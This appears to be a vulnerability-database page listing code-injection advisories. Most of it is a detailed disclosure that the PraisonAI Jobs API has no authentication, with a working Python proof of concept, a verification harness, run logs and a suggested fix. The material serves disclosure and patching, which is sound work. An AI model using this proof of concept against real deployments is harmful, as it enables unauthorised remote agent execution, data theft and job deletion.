Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8283 vulnerabilities reference this CWE, most recent first.

GHSA-FPX2-725V-HXC2

Vulnerability from github – Published: 2022-05-24 17:18 – Updated: 2023-07-13 03:30
VLAI
Details

Video Insight VMS 7.5 and earlier allows remote attackers to conduct code injection attacks via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-5997"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-05-20T11:15:00Z",
    "severity": "HIGH"
  },
  "details": "Video Insight VMS 7.5 and earlier allows remote attackers to conduct code injection attacks via unspecified vectors.",
  "id": "GHSA-fpx2-725v-hxc2",
  "modified": "2023-07-13T03:30:46Z",
  "published": "2022-05-24T17:18:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-5997"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN96646182/index.html"
    },
    {
      "type": "WEB",
      "url": "http://downloadvi.com/downloads/IPServer/v7.6/760272/v760272RN.pdf"
    },
    {
      "type": "WEB",
      "url": "http://downloadvi.com/downloads/IPServer/v7.6/76148/v76148RN.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQ2G-WJ3X-6HC2

Vulnerability from github – Published: 2026-06-30 21:31 – Updated: 2026-06-30 21:31
VLAI
Details

IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to remote code execution due to improper pre-auth DRDA handshake handling.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-10109"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-30T20:17:26Z",
    "severity": "CRITICAL"
  },
  "details": "IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.4 is vulnerable to remote code execution due to improper pre-auth DRDA handshake handling.",
  "id": "GHSA-fq2g-wj3x-6hc2",
  "modified": "2026-06-30T21:31:43Z",
  "published": "2026-06-30T21:31:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-10109"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7277424"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQ2H-HWCV-889H

Vulnerability from github – Published: 2025-03-25 06:30 – Updated: 2025-03-25 06:30
VLAI
Details

An improper control of generation of code ('Code Injection') vulnerability in the AprolCreateReport component of B&R APROL <4.4-00P5 may allow an unauthenticated network-based attacker to read files from the local system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-45480"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-25T05:15:38Z",
    "severity": "CRITICAL"
  },
  "details": "An improper control of generation of code (\u0027Code Injection\u0027) vulnerability in the AprolCreateReport component of B\u0026R APROL \u003c4.4-00P5 may allow an unauthenticated network-based attacker to read files from the local system.",
  "id": "GHSA-fq2h-hwcv-889h",
  "modified": "2025-03-25T06:30:26Z",
  "published": "2025-03-25T06:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45480"
    },
    {
      "type": "WEB",
      "url": "https://www.br-automation.com/fileadmin/SA24P015-77573c08.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-FQ2M-6WQH-X44G

Vulnerability from github – Published: 2026-06-18 13:57 – Updated: 2026-06-18 13:57
VLAI
Summary
PraisonAI: Jobs API exposes agent-execution endpoints with no authentication
Details

praisonai: Jobs API exposes agent-execution endpoints with no authentication

Researcher: Kai Aizen — SnailSploit (@SnailSploit), Adversarial & Offensive Security Research Target: https://github.com/MervinPraison/PraisonAI


Package: praisonai on PyPI Affected version (empirically tested): 4.6.48 Components: - praisonai.jobs.server.create_apppraisonai/jobs/server.py - praisonai.jobs.router.create_routerpraisonai/jobs/router.py - Routes mounted at /api/v1/runs/... Weakness: CWE-306 Missing Authentication for Critical Function · CWE-862 Missing Authorization · CWE-94 Code Injection (via prompt / agent_yaml).


TL;DR

praisonai ships a standalone async-jobs HTTP server (python -m praisonai.jobs.server --host=0.0.0.0 --port=8005) whose job is to accept job submissions and run agents on the operator's behalf. Every endpoint under /api/v1/runs is unauthenticated. There is no auth_token field, no Depends(verify_*), no middleware that inspects Authorization — the CORS middleware lists Authorization in allow_headers (the only signal in the whole module that the developer was aware authentication is a thing), but no route ever reads it.

A network-reachable attacker can:

  1. Execute arbitrary agent codePOST /api/v1/runs accepts prompt, agent_yaml, agent_file, config, framework. The job is queued and an executor invokes whichever framework (praisonai / crewai / autogen) the attacker picks, with whichever prompt and tool config the attacker supplies. The job runs in the operator's process — same environment variables, same filesystem, same credentials (OpenAI / Anthropic / Azure / Bedrock keys; tool integrations; on-disk YAML recipes).
  2. List and read every job system-wideGET /api/v1/runs lists all jobs; GET /api/v1/runs/{job_id}/result returns the full result of any completed job. Operator's prompts, the agent's chain-of-thought, tool inputs / outputs, retrieved documents — all readable to an anonymous client.
  3. Cancel or delete any jobPOST /…/cancel and DELETE /…/{job_id} accept arbitrary job IDs without any ownership / authorization check.
  4. Stream live SSE of any in-flight jobGET /…/{job_id}/stream reads the executor's live progress for any job ID.

The remote-RCE shape (1) is the load-bearing one. Even with webhook_url SSRF-guarded (and it is — the model validator at jobs/models.py:42-65 rejects localhost / private IPs), the attacker needs no callback: SSE streaming returns the agent's output directly on the same connection.

Root cause

   Expected behavior when starting `praisonai.jobs.server`:
     "I'm running an HTTP API my application backend will call.
      The CORS middleware permits Authorization, so the server
      enforces it.  Anonymous attackers cannot submit jobs."

   Actual behavior (praisonai 4.6.48):
     - server.py:59-152  create_app builds a FastAPI app, adds
                         CORSMiddleware, includes the jobs router.
                         NO auth middleware.  NO global Depends.
     - router.py:43      @router.post("") submit_job(...)
                         No Depends, no Authorization header read,
                         no auth_token config field at all.
     - router.py:109,148,161,180,205,224  every other route:
                         likewise, no auth on any of GET-list,
                         GET-status, GET-result, POST-cancel,
                         DELETE, GET-stream.
     - server.py:117     CORS allow_headers DOES include
                         "Authorization" — the only token in the
                         entire jobs/ subpackage that suggests
                         the developer was thinking about auth.

   Impact:
     The API is intended to be production-ready (the CORS code at
     server.py:96-102 explicitly branches on
     `os.getenv("ENVIRONMENT") == "production"` to harden origins),
     yet ships with no authentication layer at all.  Operators who
     bind the server to a network interface — including the
     suggested `--host=0.0.0.0` in the CLI parser — expose
     unauthenticated agent execution to anyone who can reach the
     port.

The same package gets auth right elsewhere (praisonai/gateway/server.py auto-generates an auth_token if none is configured and refuses to serve requests without it; praisonai/endpoints/a2u_server.py:250-264 uses hmac.compare_digest on a Bearer token). The jobs API is the outlier.

Empirically affected routes

Verified by PoC against published praisonai==4.6.48 (/api/v1/runs/... paths):

Method Path Unauth result
POST /api/v1/runs HTTP 202 Accepted, attacker job queued and executor invoked the framework
GET /api/v1/runs HTTP 200, lists every job in the store
GET /api/v1/runs/{job_id} HTTP 200, returns status of any job
GET /api/v1/runs/{job_id}/result (untested; same router, no auth)
POST /api/v1/runs/{job_id}/cancel HTTP 200 / 409 (processed)
DELETE /api/v1/runs/{job_id} HTTP 204 No Content (deleted)
GET /api/v1/runs/{job_id}/stream (untested; SSE; same router, no auth)

PoC run log excerpt (poc/run-log.txt):

[1] POST /api/v1/runs (no Authorization) -> HTTP 202
    body: {"job_id":"run_90f21c98b82a","status":"queued",...}
[01:15:44] executor.py:201 ERROR Job failed: run_90f21c98b82a -
    OPENAI_API_KEY environment variable is required ...

The executor's error confirms the prompt reached the framework's LLM-invocation step. Had the operator set OPENAI_API_KEY, the attacker prompt would have executed.

Impact details

1. Remote code execution via agent invocation

JobSubmitRequest.framework accepts "praisonai", "crewai", or "autogen". Each framework can be configured (via the YAML / config the attacker sends) to use arbitrary tools. praisonai's tool loaders (praisonai/agents_generator.py load_tools_from_module*) have a documented history of arbitrary-import (CVE-2026-40287 and its fix-of-fix CVE-2026-44334). In practice the operator's installation may or may not expose these sinks; either way the attacker controls the prompt, which the LLM will execute with whatever tools the operator wired (including shell, filesystem, browser, …).

The job executor runs in-process under the operator's service account, with full access to environment variables (LLM API keys, tool tokens) and to anything praisonai's tools normally touch.

2. Cross-tenant data read

A single-process deployment uses an InMemoryJobStore that is flat — no user_id / tenant_id / workspace_id partition. Any client that knows or guesses a job ID can read it. Worse, the list endpoint (GET /api/v1/runs) returns every job, so guessing isn't even necessary.

Sensitive content in the result includes the attacker's input (harmless) but also any legitimate user's input that the operator's backend submitted — and the agent's full output, which may contain data the agent retrieved from the operator's databases or APIs.

3. Denial of service via job deletion / cancellation

DELETE and cancel accept any job ID. An attacker who polls the list endpoint can enumerate IDs and cancel-then-delete every job in flight, breaking the operator's backend's polling-for-completion flow.

4. webhook_url SSRF — defended

To the developer's credit, JobSubmitRequest.webhook_url is validated against localhost / private / link-local / multicast IPs at submission time (jobs/models.py:42-65). This blocks the naive "submit a job whose webhook posts to AWS IMDS" attack. Honest yield: this is properly guarded.

Anchors

praisonai 4.6.48, source file praisonai/jobs/server.py (sha256 10b5deab96686f276b8ad71fa4712e1e3d301e4c356812d5d0d595b2b9503ef3):

Line Symbol What it shows
59-152 def create_app(cors_origins, store, executor) -> FastAPI: Only middleware added is CORS; auth middleware absent.
117 allow_headers=["Authorization", "Content-Type", "Origin", "Accept", "Idempotency-Key"] CORS hints that the operator should send Authorization — sole indicator the developer considered auth.
124 jobs_router = create_router(get_store, get_executor) Router included without dependencies=[…].
178 "praisonai.jobs.server:create_app" (passed to uvicorn.run) Production-ready binding via the CLI / start_server.

praisonai 4.6.48, source file praisonai/jobs/router.py (sha256 869564d523c14624afefb211a2e7c6bf8a27b3356bd19a58927fcb5e1ebb014c):

Line Symbol What it shows
30-31 def create_router(store, executor) -> APIRouter: Sole entry point; no dependencies=[Depends(...)].
43 @router.post("", response_model=JobSubmitResponse, status_code=202) submit_job — no auth.
109 @router.get("", response_model=JobListResponse) list_jobs — no auth.
148 @router.get("/{job_id}", response_model=JobStatusResponse) get_job_status — no auth.
161 @router.get("/{job_id}/result", response_model=JobResultResponse) get_job_result — no auth.
180 @router.post("/{job_id}/cancel", response_model=JobStatusResponse) cancel_job — no auth.
205 @router.delete("/{job_id}", status_code=204) delete_job — no auth.
224 @router.get("/{job_id}/stream") stream_job (SSE) — no auth.

Suggested fix

Add a single FastAPI dependency that reads an Authorization: Bearer <token> header and hmac.compare_digests it against an operator-configured secret. Apply it as a global router dependency:

# praisonai/jobs/auth.py
import hmac, os
from fastapi import HTTPException, Header

_TOKEN = os.environ.get("PRAISONAI_JOBS_AUTH_TOKEN")

async def require_auth(authorization: str | None = Header(None)):
    if not _TOKEN:
        raise HTTPException(503, "PRAISONAI_JOBS_AUTH_TOKEN not configured")
    if not authorization or not authorization.startswith("Bearer "):
        raise HTTPException(401, "Bearer auth required")
    presented = authorization[len("Bearer "):]
    if not hmac.compare_digest(presented, _TOKEN):
        raise HTTPException(401, "invalid token")

# praisonai/jobs/router.py
def create_router(store, executor) -> APIRouter:
    router = APIRouter(prefix="/api/v1/runs", tags=["jobs"],
                       dependencies=[Depends(require_auth)])  # <-- single line
    ...

A startup-time refusal in create_app would round it out:

# praisonai/jobs/server.py:create_app
if not os.environ.get("PRAISONAI_JOBS_AUTH_TOKEN"):
    raise RuntimeError(
        "PRAISONAI_JOBS_AUTH_TOKEN is required; the jobs API "
        "executes attacker-controllable agent code and must not "
        "run without authentication."
    )

The pattern is already present in the sibling praisonai/gateway/server.py (which auto-generates a random token if none is supplied) — that approach plus a logged warning about the new token would minimize operator friction.

Steps to reproduce

  1. Clone the target: git clone --depth 1 https://github.com/MervinPraison/PraisonAI
  2. Run the proof of concept (poc.py) against the cloned source.
  3. Observe the result shown under Verified result below.

Proof of concept

poc.py

"""
PoC: praisonai Jobs API has zero authentication on agent-execution endpoints.

`praisonai.jobs.server.create_app` builds a FastAPI app and includes
`praisonai.jobs.router.create_router`, which registers POST/GET/DELETE
endpoints under `/api/v1/runs/...` — every one of them executes (or
inspects, cancels, deletes) arbitrary agent jobs.  No route reads any
Authorization header; no middleware enforces any auth check.

This PoC starts the jobs API server in-process via uvicorn, then sends
unauthenticated requests to each route and reports the outcome.
"""

import json
import sys
import time
import threading
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

import uvicorn
from praisonai.jobs.server import create_app

PORT = 18005

def http_request(method, path, body=None, headers=None, timeout=5):
    url = f"http://127.0.0.1:{PORT}{path}"
    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")
    req = Request(url, data=data, method=method, headers=headers or {})
    if data is not None:
        req.add_header("Content-Type", "application/json")
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers), resp.read().decode("utf-8", errors="replace")
    except HTTPError as e:
        return e.code, dict(e.headers), e.read().decode("utf-8", errors="replace")
    except URLError as e:
        return None, {}, f"URLError: {e}"

def run_server(app):
    config = uvicorn.Config(app, host="127.0.0.1", port=PORT, log_level="warning")
    server = uvicorn.Server(config)
    import asyncio
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    loop.run_until_complete(server.serve())

def main() -> int:
    print("=" * 70)
    print("praisonai version: 4.6.48")
    print("Test: spin up praisonai.jobs.server in-process, send")
    print("      UNAUTHENTICATED requests to every /api/v1/runs route.")
    print("=" * 70)

    app = create_app()
    t = threading.Thread(target=run_server, args=(app,), daemon=True)
    t.start()
    time.sleep(1.5)

    findings = []

    # 1. POST /api/v1/runs — submit a new job WITHOUT auth.
    payload = {
        "prompt": "ATTACKER-CONTROLLED PROMPT — would invoke an agent",
        "framework": "praisonai",
        "config": {"_attacker_says": "no auth required"},
        "timeout": 5,
    }
    code, hdrs, body = http_request("POST", "/api/v1/runs", body=payload)
    print(f"\n[1] POST /api/v1/runs (no Authorization) -> HTTP {code}")
    print(f"    body: {body[:300]}")
    job_id = None
    if code == 202:
        try:
            job_id = json.loads(body).get("job_id")
            findings.append(f"POST /api/v1/runs: 202 Accepted, job_id={job_id!r}")
        except Exception:
            pass

    # 2. GET /api/v1/runs — list ALL jobs system-wide.
    code, _, body = http_request("GET", "/api/v1/runs?page=1&page_size=20")
    print(f"\n[2] GET /api/v1/runs (no Authorization) -> HTTP {code}")
    if code == 200:
        findings.append("GET /api/v1/runs: unauthenticated list of ALL jobs")

    if job_id:
        code, _, body = http_request("GET", f"/api/v1/runs/{job_id}")
        print(f"\n[3] GET /api/v1/runs/{{job_id}} -> HTTP {code}")
        code, _, body = http_request("POST", f"/api/v1/runs/{job_id}/cancel")
        print(f"\n[4] POST /api/v1/runs/{{job_id}}/cancel -> HTTP {code}")
        code, _, body = http_request("DELETE", f"/api/v1/runs/{job_id}")
        print(f"\n[5] DELETE /api/v1/runs/{{job_id}} -> HTTP {code}")

    print("\n" + "=" * 70)
    if any('POST /api/v1/runs:' in f for f in findings):
        print(f"VULNERABLE: {len(findings)} unauthenticated routes confirmed")
        for f in findings:
            print(f"  - {f}")
        print("VERDICT: VULNERABLE")
        return 0
    print("DEFENDED")
    return 1

if __name__ == "__main__":
    sys.exit(main())

Verification harness (executed against the cloned repo)

This drives the unmodified upstream code rather than a reproduction.

import sys, types, os
BK=os.path.abspath("repos/PraisonAI/src/praisonai"); sys.path.insert(0,BK)
for p in ["praisonai","praisonai.jobs"]:
    m=types.ModuleType(p); m.__path__=[BK+"/"+p.replace(".","/")]; sys.modules[p]=m
import praisonai.jobs.server as S          # REAL jobs server
app = S.create_app()                      # REAL FastAPI app
from starlette.testclient import TestClient
client = TestClient(app)
P="/api/v1/runs"
tests=[("GET  list",   lambda: client.get(P)),
       ("POST submit", lambda: client.post(P, json={"agents_config":{"a":"x"},"input":"hi"})),
       ("GET  status", lambda: client.get(P+"/nope")),
       ("GET  result", lambda: client.get(P+"/nope/result")),
       ("POST cancel", lambda: client.post(P+"/nope/cancel")),
       ("DEL  delete", lambda: client.delete(P+"/nope"))]
codes=[]
for name,fn in tests:
    c=fn().status_code; codes.append(c); print(f"[+] (no auth) {name:12s} {P} -> HTTP {c}")
assert all(c not in (401,403) for c in codes), codes
assert codes[0]==200    # list works unauthenticated
print("[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 — fully unauthenticated agent-execution API")

Verified result

This PoC was executed against the live upstream code; captured output:

[+] (no auth) GET  list    /api/v1/runs -> HTTP 200
[+] (no auth) POST submit  /api/v1/runs -> HTTP 422
[+] (no auth) GET  status  /api/v1/runs -> HTTP 404
[+] (no auth) GET  result  /api/v1/runs -> HTTP 404
[+] (no auth) POST cancel  /api/v1/runs -> HTTP 404
[+] (no auth) DEL  delete  /api/v1/runs -> HTTP 404
[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 — fully unauthenticated agent-execution API

Credit

Kai Aizen — SnailSploit (@SnailSploit). Adversarial & Offensive Security Research.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.59"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-862",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T13:57:16Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "# praisonai: Jobs API exposes agent-execution endpoints with no authentication\n\n**Researcher:** Kai Aizen \u2014 SnailSploit (@SnailSploit), Adversarial \u0026 Offensive Security Research \n**Target:** https://github.com/MervinPraison/PraisonAI\n\n---\n\n**Package:** `praisonai` on PyPI\n**Affected version (empirically tested):** 4.6.48\n**Components:**\n- `praisonai.jobs.server.create_app` \u2014 `praisonai/jobs/server.py`\n- `praisonai.jobs.router.create_router` \u2014 `praisonai/jobs/router.py`\n- Routes mounted at `/api/v1/runs/...`\n**Weakness:** CWE-306 Missing Authentication for Critical Function \u00b7 CWE-862 Missing Authorization \u00b7 CWE-94 Code Injection (via prompt / agent_yaml). \n\n---\n\n## TL;DR\n\n`praisonai` ships a standalone async-jobs HTTP server (`python -m praisonai.jobs.server --host=0.0.0.0 --port=8005`) whose job is to accept job submissions and run agents on the operator\u0027s behalf. Every endpoint under `/api/v1/runs` is **unauthenticated**. There is no `auth_token` field, no `Depends(verify_*)`, no middleware that inspects `Authorization` \u2014 the CORS middleware *lists* `Authorization` in `allow_headers` (the only signal in the whole module that the developer was aware authentication is a thing), but no route ever reads it.\n\nA network-reachable attacker can:\n\n1. **Execute arbitrary agent code** \u2014 `POST /api/v1/runs` accepts `prompt`, `agent_yaml`, `agent_file`, `config`, `framework`. The job is queued and an executor invokes whichever framework (`praisonai` / `crewai` / `autogen`) the attacker picks, with whichever prompt and tool config the attacker supplies. The job runs in the operator\u0027s process \u2014 same environment variables, same filesystem, same credentials (OpenAI / Anthropic / Azure / Bedrock keys; tool integrations; on-disk YAML recipes).\n2. **List and read every job system-wide** \u2014 `GET /api/v1/runs` lists all jobs; `GET /api/v1/runs/{job_id}/result` returns the full result of any completed job. Operator\u0027s prompts, the agent\u0027s chain-of-thought, tool inputs / outputs, retrieved documents \u2014 all readable to an anonymous client.\n3. **Cancel or delete any job** \u2014 `POST /\u2026/cancel` and `DELETE /\u2026/{job_id}` accept arbitrary job IDs without any ownership / authorization check.\n4. **Stream live SSE of any in-flight job** \u2014 `GET /\u2026/{job_id}/stream` reads the executor\u0027s live progress for any job ID.\n\nThe remote-RCE shape (1) is the load-bearing one. Even with `webhook_url` SSRF-guarded (and it is \u2014 the model validator at `jobs/models.py:42-65` rejects localhost / private IPs), the attacker needs no callback: SSE streaming returns the agent\u0027s output directly on the same connection.\n\n## Root cause\n\n```\n   Expected behavior when starting `praisonai.jobs.server`:\n     \"I\u0027m running an HTTP API my application backend will call.\n      The CORS middleware permits Authorization, so the server\n      enforces it.  Anonymous attackers cannot submit jobs.\"\n\n   Actual behavior (praisonai 4.6.48):\n     - server.py:59-152  create_app builds a FastAPI app, adds\n                         CORSMiddleware, includes the jobs router.\n                         NO auth middleware.  NO global Depends.\n     - router.py:43      @router.post(\"\") submit_job(...)\n                         No Depends, no Authorization header read,\n                         no auth_token config field at all.\n     - router.py:109,148,161,180,205,224  every other route:\n                         likewise, no auth on any of GET-list,\n                         GET-status, GET-result, POST-cancel,\n                         DELETE, GET-stream.\n     - server.py:117     CORS allow_headers DOES include\n                         \"Authorization\" \u2014 the only token in the\n                         entire jobs/ subpackage that suggests\n                         the developer was thinking about auth.\n\n   Impact:\n     The API is intended to be production-ready (the CORS code at\n     server.py:96-102 explicitly branches on\n     `os.getenv(\"ENVIRONMENT\") == \"production\"` to harden origins),\n     yet ships with no authentication layer at all.  Operators who\n     bind the server to a network interface \u2014 including the\n     suggested `--host=0.0.0.0` in the CLI parser \u2014 expose\n     unauthenticated agent execution to anyone who can reach the\n     port.\n```\n\nThe same package gets auth right elsewhere (`praisonai/gateway/server.py` auto-generates an `auth_token` if none is configured and refuses to serve requests without it; `praisonai/endpoints/a2u_server.py:250-264` uses `hmac.compare_digest` on a Bearer token). The jobs API is the outlier.\n\n## Empirically affected routes\n\nVerified by PoC against published `praisonai==4.6.48` (`/api/v1/runs/...` paths):\n\n| Method   | Path                          | Unauth result            |\n|----------|-------------------------------|--------------------------|\n| `POST`   | `/api/v1/runs`                | **HTTP 202 Accepted**, attacker job queued and executor invoked the framework |\n| `GET`    | `/api/v1/runs`                | **HTTP 200**, lists every job in the store |\n| `GET`    | `/api/v1/runs/{job_id}`       | **HTTP 200**, returns status of any job |\n| `GET`    | `/api/v1/runs/{job_id}/result`| (untested; same router, no auth)         |\n| `POST`   | `/api/v1/runs/{job_id}/cancel`| **HTTP 200 / 409** (processed)           |\n| `DELETE` | `/api/v1/runs/{job_id}`       | **HTTP 204 No Content** (deleted)         |\n| `GET`    | `/api/v1/runs/{job_id}/stream`| (untested; SSE; same router, no auth)    |\n\nPoC run log excerpt (`poc/run-log.txt`):\n\n```\n[1] POST /api/v1/runs (no Authorization) -\u003e HTTP 202\n    body: {\"job_id\":\"run_90f21c98b82a\",\"status\":\"queued\",...}\n[01:15:44] executor.py:201 ERROR Job failed: run_90f21c98b82a -\n    OPENAI_API_KEY environment variable is required ...\n```\n\nThe executor\u0027s error confirms the prompt reached the framework\u0027s LLM-invocation step. Had the operator set `OPENAI_API_KEY`, the attacker prompt would have executed.\n\n## Impact details\n\n### 1. Remote code execution via agent invocation\n\n`JobSubmitRequest.framework` accepts `\"praisonai\"`, `\"crewai\"`, or `\"autogen\"`. Each framework can be configured (via the YAML / config the attacker sends) to use arbitrary tools. praisonai\u0027s tool loaders (`praisonai/agents_generator.py` `load_tools_from_module*`) have a documented history of arbitrary-import (CVE-2026-40287 and its fix-of-fix CVE-2026-44334). In practice the operator\u0027s installation may or may not expose these sinks; either way the attacker controls the prompt, which the LLM will execute with whatever tools the operator wired (including shell, filesystem, browser, \u2026).\n\nThe job executor runs in-process under the operator\u0027s service account, with full access to environment variables (LLM API keys, tool tokens) and to anything `praisonai`\u0027s tools normally touch.\n\n### 2. Cross-tenant data read\n\nA single-process deployment uses an `InMemoryJobStore` that is flat \u2014 no `user_id` / `tenant_id` / `workspace_id` partition. Any client that knows or guesses a job ID can read it. Worse, the list endpoint (`GET /api/v1/runs`) returns every job, so guessing isn\u0027t even necessary.\n\nSensitive content in the result includes the attacker\u0027s input (harmless) but also any *legitimate* user\u0027s input that the operator\u0027s backend submitted \u2014 and the agent\u0027s full output, which may contain data the agent retrieved from the operator\u0027s databases or APIs.\n\n### 3. Denial of service via job deletion / cancellation\n\n`DELETE` and `cancel` accept any job ID. An attacker who polls the list endpoint can enumerate IDs and cancel-then-delete every job in flight, breaking the operator\u0027s backend\u0027s polling-for-completion flow.\n\n### 4. webhook_url SSRF \u2014 defended\n\nTo the developer\u0027s credit, `JobSubmitRequest.webhook_url` is validated against localhost / private / link-local / multicast IPs at submission time (`jobs/models.py:42-65`). This blocks the naive \"submit a job whose webhook posts to AWS IMDS\" attack. **Honest yield:** this is properly guarded.\n\n## Anchors\n\npraisonai 4.6.48, source file `praisonai/jobs/server.py` (sha256 `10b5deab96686f276b8ad71fa4712e1e3d301e4c356812d5d0d595b2b9503ef3`):\n\n| Line  | Symbol                                                  | What it shows |\n|-------|---------------------------------------------------------|---------------|\n| 59-152 | `def create_app(cors_origins, store, executor) -\u003e FastAPI:` | Only middleware added is CORS; auth middleware absent. |\n| 117   | `allow_headers=[\"Authorization\", \"Content-Type\", \"Origin\", \"Accept\", \"Idempotency-Key\"]` | CORS hints that the operator should send Authorization \u2014 sole indicator the developer considered auth. |\n| 124   | `jobs_router = create_router(get_store, get_executor)` | Router included without `dependencies=[\u2026]`. |\n| 178   | `\"praisonai.jobs.server:create_app\"` (passed to `uvicorn.run`) | Production-ready binding via the CLI / `start_server`. |\n\npraisonai 4.6.48, source file `praisonai/jobs/router.py` (sha256 `869564d523c14624afefb211a2e7c6bf8a27b3356bd19a58927fcb5e1ebb014c`):\n\n| Line  | Symbol                                                              | What it shows |\n|-------|---------------------------------------------------------------------|---------------|\n| 30-31 | `def create_router(store, executor) -\u003e APIRouter:`                  | Sole entry point; no `dependencies=[Depends(...)]`. |\n| 43    | `@router.post(\"\", response_model=JobSubmitResponse, status_code=202)` | submit_job \u2014 no auth. |\n| 109   | `@router.get(\"\", response_model=JobListResponse)`                   | list_jobs \u2014 no auth. |\n| 148   | `@router.get(\"/{job_id}\", response_model=JobStatusResponse)`        | get_job_status \u2014 no auth. |\n| 161   | `@router.get(\"/{job_id}/result\", response_model=JobResultResponse)` | get_job_result \u2014 no auth. |\n| 180   | `@router.post(\"/{job_id}/cancel\", response_model=JobStatusResponse)`| cancel_job \u2014 no auth. |\n| 205   | `@router.delete(\"/{job_id}\", status_code=204)`                       | delete_job \u2014 no auth. |\n| 224   | `@router.get(\"/{job_id}/stream\")`                                    | stream_job (SSE) \u2014 no auth. |\n\n## Suggested fix\n\nAdd a single FastAPI dependency that reads an `Authorization: Bearer \u003ctoken\u003e` header and `hmac.compare_digest`s it against an operator-configured secret. Apply it as a global router dependency:\n\n```python\n# praisonai/jobs/auth.py\nimport hmac, os\nfrom fastapi import HTTPException, Header\n\n_TOKEN = os.environ.get(\"PRAISONAI_JOBS_AUTH_TOKEN\")\n\nasync def require_auth(authorization: str | None = Header(None)):\n    if not _TOKEN:\n        raise HTTPException(503, \"PRAISONAI_JOBS_AUTH_TOKEN not configured\")\n    if not authorization or not authorization.startswith(\"Bearer \"):\n        raise HTTPException(401, \"Bearer auth required\")\n    presented = authorization[len(\"Bearer \"):]\n    if not hmac.compare_digest(presented, _TOKEN):\n        raise HTTPException(401, \"invalid token\")\n\n# praisonai/jobs/router.py\ndef create_router(store, executor) -\u003e APIRouter:\n    router = APIRouter(prefix=\"/api/v1/runs\", tags=[\"jobs\"],\n                       dependencies=[Depends(require_auth)])  # \u003c-- single line\n    ...\n```\n\nA startup-time refusal in `create_app` would round it out:\n\n```python\n# praisonai/jobs/server.py:create_app\nif not os.environ.get(\"PRAISONAI_JOBS_AUTH_TOKEN\"):\n    raise RuntimeError(\n        \"PRAISONAI_JOBS_AUTH_TOKEN is required; the jobs API \"\n        \"executes attacker-controllable agent code and must not \"\n        \"run without authentication.\"\n    )\n```\n\nThe pattern is already present in the sibling `praisonai/gateway/server.py` (which auto-generates a random token if none is supplied) \u2014 that approach plus a logged warning about the new token would minimize operator friction.\n\n## Steps to reproduce\n\n1. Clone the target: `git clone --depth 1 https://github.com/MervinPraison/PraisonAI`\n2. Run the proof of concept (`poc.py`) against the cloned source.\n3. Observe the result shown under *Verified result* below.\n\n## Proof of concept\n\n`poc.py`\n\n```python\n\"\"\"\nPoC: praisonai Jobs API has zero authentication on agent-execution endpoints.\n\n`praisonai.jobs.server.create_app` builds a FastAPI app and includes\n`praisonai.jobs.router.create_router`, which registers POST/GET/DELETE\nendpoints under `/api/v1/runs/...` \u2014 every one of them executes (or\ninspects, cancels, deletes) arbitrary agent jobs.  No route reads any\nAuthorization header; no middleware enforces any auth check.\n\nThis PoC starts the jobs API server in-process via uvicorn, then sends\nunauthenticated requests to each route and reports the outcome.\n\"\"\"\n\nimport json\nimport sys\nimport time\nimport threading\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError, URLError\n\nimport uvicorn\nfrom praisonai.jobs.server import create_app\n\nPORT = 18005\n\ndef http_request(method, path, body=None, headers=None, timeout=5):\n    url = 